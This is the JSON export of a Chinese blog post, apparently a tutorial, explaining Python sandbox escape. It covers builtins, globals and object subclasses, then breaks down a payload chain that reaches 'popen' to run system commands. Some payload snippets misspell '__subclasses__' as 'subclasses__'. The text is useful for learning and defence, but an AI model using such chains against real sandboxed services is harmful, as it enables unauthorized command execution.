{"id":277,"date":"2025-11-09T10:17:58","date_gmt":"2025-11-09T10:17:58","guid":{"rendered":"http:\/\/101.42.175.115\/wordpress\/?p=277"},"modified":"2026-01-07T11:53:30","modified_gmt":"2026-01-07T11:53:30","slug":"py_rce","status":"publish","type":"post","link":"http:\/\/101.42.175.115\/wordpress\/?p=277","title":{"rendered":"Python\u4e2d\u7684\u6c99\u7bb1\u9003\u9038"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">python\u4e0b\u7684Rce\u73af\u5883<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">object\u7c7b<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728 python \u4e2d\uff0c\u6240\u6709\u7c7b\u7684\u9876\u5c42\u7236\u7c7b\u662f <strong>object<\/strong> \u7c7b\uff0c\u6240\u6709\u7c7b\u90fd\u76f4\u63a5\u6216\u95f4\u63a5\u7684\u7ee7\u627f\u4e8e object \u7c7b\u3002object \u7c7b\u4f9b\u4e86\u8bb8\u591a\u57fa\u7840\u529f\u80fd\uff0c\u4f8b\u5982 <code>__class__<\/code>\u3001<code>__dir__<\/code>\u3001<code>__getattribute__<\/code> \u7b49\u5c5e\u6027\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">object \u4e0b\u6709\u5f88\u591a\u76f4\u63a5\u5b50\u7c7b\uff0c\u53ef\u4ee5\u901a\u8fc7 __subclasses__ \u7c7b\u65b9\u6cd5\u83b7\u53d6 object \u7684\u6240\u6709\u5b50\u7c7b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>print(object.__subclasses__())<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">object<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__subclasses__<\/span><span style=\"color: #999999\">())<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u547d\u540d\u7a7a\u95f4<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728 Python \u4e2d\uff0c<strong>\u547d\u540d\u7a7a\u95f4<\/strong>\uff08Namespace\uff09\u662f\u4e00\u4e2a\u7528\u4e8e\u5b58\u50a8\u6807\u8bc6\u7b26\uff08\u5982\u53d8\u91cf\u540d\u3001\u51fd\u6570\u540d\u3001\u7c7b\u540d\u7b49\uff09\u53ca\u5176\u5bf9\u5e94\u5bf9\u8c61\u7684\u5b57\u5178\u3002\u547d\u540d\u7a7a\u95f4\u7684\u4e3b\u8981\u4f5c\u7528\u662f\u7ba1\u7406\u548c\u7ef4\u62a4\u5bf9\u8c61\u7684\u53ef\u8bbf\u95ee\u6027\u548c\u751f\u547d\u5468\u671f\u3002\u6bcf\u4e2a\u547d\u540d\u7a7a\u95f4\u90fd\u5305\u542b\u4e86\u4e00\u4e9b\u540d\u5b57\u548c\u5b83\u4eec\u6240\u4ee3\u8868\u7684\u5bf9\u8c61\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5185\u7f6e\u547d\u540d\u7a7a\u95f4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u5185\u7f6e\u547d\u540d\u7a7a\u95f4<\/strong>\uff08Built-in Namespace\uff09\u662f\u4e00\u4e2a\u7279\u6b8a\u7684\u547d\u540d\u7a7a\u95f4\uff0c\u5305\u542b\u4e86\u6240\u6709 python \u5185\u7f6e\u7684\u5bf9\u8c61\u3001\u51fd\u6570\u7b49\u3002\u5b83\u662f\u5728 python \u89e3\u91ca\u5668\u542f\u52a8\u65f6\u81ea\u52a8\u52a0\u8f7d\u7684\uff0c\u5bf9\u4e8e\u6574\u4e2a python \u7a0b\u5e8f\u90fd\u662f\u53ef\u7528\u7684\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>builtins<\/strong> \u6a21\u5757\u5305\u542b\u4e86\u6240\u6709 python \u89e3\u91ca\u5668\u542f\u52a8\u65f6\u81ea\u52a8\u52a0\u8f7d\u7684\u5185\u7f6e\u5bf9\u8c61\uff0c\u5185\u7f6e\u547d\u540d\u7a7a\u95f4\u7684\u5185\u5bb9\u5c31\u662f builtins \u6a21\u5757\u4e2d\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>__builtins__<\/strong> \u662f\u6307\u5411<strong>\u5185\u7f6e\u547d\u540d\u7a7a\u95f4<\/strong>\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u67e5\u770b\u5185\u7f6e\u51fd\u6570<\/strong><\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>print(__builtins__)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">__builtins__<\/span><span style=\"color: #999999\">)<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u901a\u8fc7 __builtins__ \u8c03\u7528\u5185\u7f6e\u51fd\u6570<\/strong><\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>__builtins__&#91;'print'&#93;(1)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">__builtins__<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">print<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;(<\/span><span style=\"color: #2F798A\">1<\/span><span style=\"color: #999999\">)<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/strong>\uff08Global Namespace\uff09\u662f\u6a21\u5757\u7ea7\u522b\u7684\u547d\u540d\u7a7a\u95f4\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>globals<\/strong> \u51fd\u6570\u53ef\u4ee5\u8bbf\u95ee\u5f53\u524d\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly># \u8bbf\u95ee\u5168\u5c40\u547d\u540d\u7a7a\u95f4\nprint(globals())<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #A0ADA0\"># \u8bbf\u95ee\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">globals<\/span><span style=\"color: #999999\">())<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e86\u89e3\u4e86\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u7684\u6982\u5ff5\u540e\u6211\u4eec\u8fd8\u8981\u77e5\u9053 <strong>__globals__<\/strong>\u3002 \u6bcf\u4e2a\u51fd\u6570\u5728 python \u4e2d\u90fd\u6709\u4e00\u4e2a <strong>__globals__<\/strong> \u5c5e\u6027\uff0c\u5b83\u6307\u5411\u8be5\u51fd\u6570\u88ab\u5b9a\u4e49\u65f6\u6240\u5728\u6a21\u5757\u7684<strong>\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/strong>\u3002<\/p>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">sys.modules<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>sys.modules<\/strong> \u662f\u4e00\u4e2a\u5b57\u5178\uff0c\u5b58\u50a8\u4e86 Python \u89e3\u91ca\u5668<strong>\u52a0\u8f7d\u7684\u6240\u6709\u6a21\u5757<\/strong>\uff0c\u5728 python \u542f\u52a8\u65f6\u9ed8\u8ba4\u542b\u6709\u4e00\u4e9b\u6a21\u5757\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u5728\u5199 python \u7a0b\u5e8f\u7684\u65f6\u5019\uff0cimport \u7684\u4f5c\u7528\u662f\u628a\u6a21\u5757\u52a0\u5165\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002import \u65f6\u4f1a\u5148\u68c0\u67e5 sys.modules \uff0csys.modules \u4e2d\u5df2\u6709\u7684\u6a21\u5757\u4ece sys.modules \u4e2d\u52a0\u8f7d\uff0c\u5426\u5219\u4ece\u6a21\u5757\u6587\u4ef6\u4e2d\u52a0\u8f7d\u3002<\/p>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u52a8\u6001\u8bbf\u95ee<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728 python \u4e2d\u6709\u7740\u975e\u5e38\u4e30\u5bcc\u7684\u52a8\u6001\u8bbf\u95ee\u529f\u80fd\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>python \u5141\u8bb8\u901a\u8fc7\u70b9\uff08<code>.<\/code>\uff09\u64cd\u4f5c\u7b26\u8bbf\u95ee\u7c7b\u5bf9\u8c61\u3001\u5b9e\u4f8b\u5bf9\u8c61\u7684\u5c5e\u6027\u548c\u65b9\u6cd5\uff0c\u8c03\u7528\u6a21\u5757\u4e2d\u7684\u51fd\u6570\u3002<\/li>\n\n\n\n<li>object \u7c7b\u53ca\u5176\u5b50\u7c7b\u6709\u7740\u4e30\u5bcc\u7684\u5185\u7f6e\u65b9\u6cd5\u3002<\/li>\n<\/ol>\n\n\n\n<div style=\"height:44px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Rce\u7684\u5b9e\u73b0<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u6709\u4e86\u4e0a\u8ff0\u57fa\u7840\u77e5\u8bc6\u7684\u94fa\u57ab\u5916\uff0c\u6211\u4eec\u53ef\u4ee5\u8f7b\u677e\u7684\u7406\u89e3\u4e00\u4e9b python \u4e2d\u7684 Rce \u59ff\u52bf\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5173\u952e\u8bcd\u8fc7\u6ee4<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u901a\u8fc7 eval \u548c exec \u8fd9\u4e24\u4e2a\u4ee3\u7801\u6267\u884c\u51fd\u6570\u7ed5\u8fc7\uff0c\u56e0\u4e3a\u5728\u8fd9\u4e24\u4e2a\u51fd\u6570\u4e2d\u7cfb\u7edf\u547d\u4ee4\u8bed\u53e5\u4f5c\u4e3a\u5b57\u7b26\u4e32\u5448\u73b0\uff0c\u800c\u5b57\u7b26\u4e32\u672c\u8eab\u6709\u7740\u975e\u5e38\u591a\u7684\u62fc\u63a5\u548c\u7f16\u7801\u65b9\u5f0f\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u73af\u5883\u8fc7\u6ee4<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u8fc7\u6ee4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u76f4\u63a5\u4ece\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u4e0a\u8fdb\u884c\u8fc7\u6ee4\uff0c\u4f8b\u5982\u65e0\u6cd5\u4f7f\u7528\u5185\u7f6e\u51fd\u6570\uff0c\u8fd9\u65f6\u5019\u53ef\u4ee5\u901a\u8fc7\u94fe\u5f0f\u8bbf\u95ee\u6765\u8fdb\u884c Rce\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u77e5\u9053\u5728 python \u89e3\u91ca\u5668\u542f\u52a8\u7684\u65f6\u5019\u9ed8\u8ba4\u4f1a\u52a0\u8f7d\u4e00\u4e9b\u6a21\u5757\uff0c\u50a8\u5b58\u5728 sys.modules \u4e2d\u3002\u5982\u679c\u6211\u4eec\u80fd\u901a\u8fc7\u67d0\u79cd\u65b9\u5f0f\u62ff\u5230\u8fd9\u4e9b\u5df2\u7ecf\u52a0\u8f7d\u7684\u6a21\u5757\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u4e2d\u7684\u7cfb\u7edf\u547d\u4ee4\u6267\u884c\u51fd\u6570\uff0c\u5c31\u80fd\u5b9e\u73b0 Rce \u4e86\u3002\u800c python \u4e2d\u4e30\u5bcc\u7684\u52a8\u6001\u8bbf\u95ee\u529f\u80fd\u63d0\u4f9b\u4e86\u5b9e\u73b0\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u62ff\u4e00\u4e2a payload \u6765\u4e3e\u4f8b\u8bf4\u660e\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__.subclasses__()&#91;\u4e0b\u6807&#93;.__init__.__globals__&#91;'popen'&#93;('ls').read()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">subclasses__<\/span><span style=\"color: #999999\">()&#91;<\/span><span style=\"color: #393A34\">\u4e0b\u6807<\/span><span style=\"color: #999999\">&#93;.<\/span><span style=\"color: #998418\">__init__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__globals__<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">popen<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;(<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">ls<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">).<\/span><span style=\"color: #393A34\">read<\/span><span style=\"color: #999999\">()<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u9996\u5148\u6211\u4eec\u62ff\u5230 object \u57fa\u7c7b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u7531\u6b64\u83b7\u53d6\u8be5\u73af\u5883\u4e2d\u6240\u6709\u7684\u5b50\u7c7b\uff08\u5305\u62ec\u5728 sys.modules \u4e2d\u521d\u59cb\u5316\u65f6\u52a0\u8f7d\u7684\u7c7b\uff09\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__.subclasses__()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">subclasses__<\/span><span style=\"color: #999999\">()<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u7684\u76ee\u6807\u662f\u62ff\u5230\u67d0\u4e2a\u6a21\u5757\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u4e2d\u7684\u7cfb\u7edf\u547d\u4ee4\u6267\u884c\u51fd\u6570\uff0c\u6240\u4ee5\u9996\u5148\u8981\u627e\u5230\u6ee1\u8db3\u8fd9\u4e2a\u6761\u4ef6\u7684\u7279\u5b9a\u5b50\u7c7b\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 